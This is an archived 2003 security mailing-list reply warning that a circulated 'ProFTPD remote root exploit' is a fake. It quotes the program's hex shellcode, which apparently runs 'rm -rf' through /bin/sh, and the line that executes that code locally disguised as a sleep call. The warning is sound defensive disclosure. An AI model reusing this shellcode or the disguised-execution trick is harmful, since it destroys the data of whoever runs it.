lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
From: zim at iq.pl (Robert Jaroszuk)
Subject: ProFTPD-1.2.9rc2 remote root exploit

On Fri, 24 Oct 2003, Andreas Gietl wrote:

; On Friday 24 October 2003 14:22, Jean-Kevin Grosnakeur wrote:
; 
; this seems to delete sth on the local harddisk. anybody else seeing this 
; effect?

Yea, something like that.

/* x86 bind shellcode */
char sc[]=
"\x31\xc0\x50\x68\x66\x20\x2f\x58\x68\x6d\x20\x2d\x72\x68\x2d"
"\x63\x58\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41"
"\x41\x41\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f"
"\x62\x69\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44"
"\x24\x23\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24"
"\x0c\x31\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14"
"\x31\xdb\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0"
"\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80";

[ cut ]

  /* connect to the bindshell */
  printf("Trying to connect, please wait...\n");
  void(*sleep)()=(void*)sc;sleep(5);

This exploit tries to run shellcode on local machine.
Probably smth evil in this shellcode:

-- 
..... Robert Jaroszuk - zim@iq,pl - [ IQ PL Sp. z o.o. ] .....
GCS/IT/O d? s: a-- C++ ULB++++$ P+ L++++$ E--- W- N+ w-- O- M-
V- PS+ PE Y(+) PGP-(+++) t-- 5? X- R* tv-- DI++ b++>+++ DI- D-
... The superior warrior wins without fighting -- Sun Tzu. ...

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ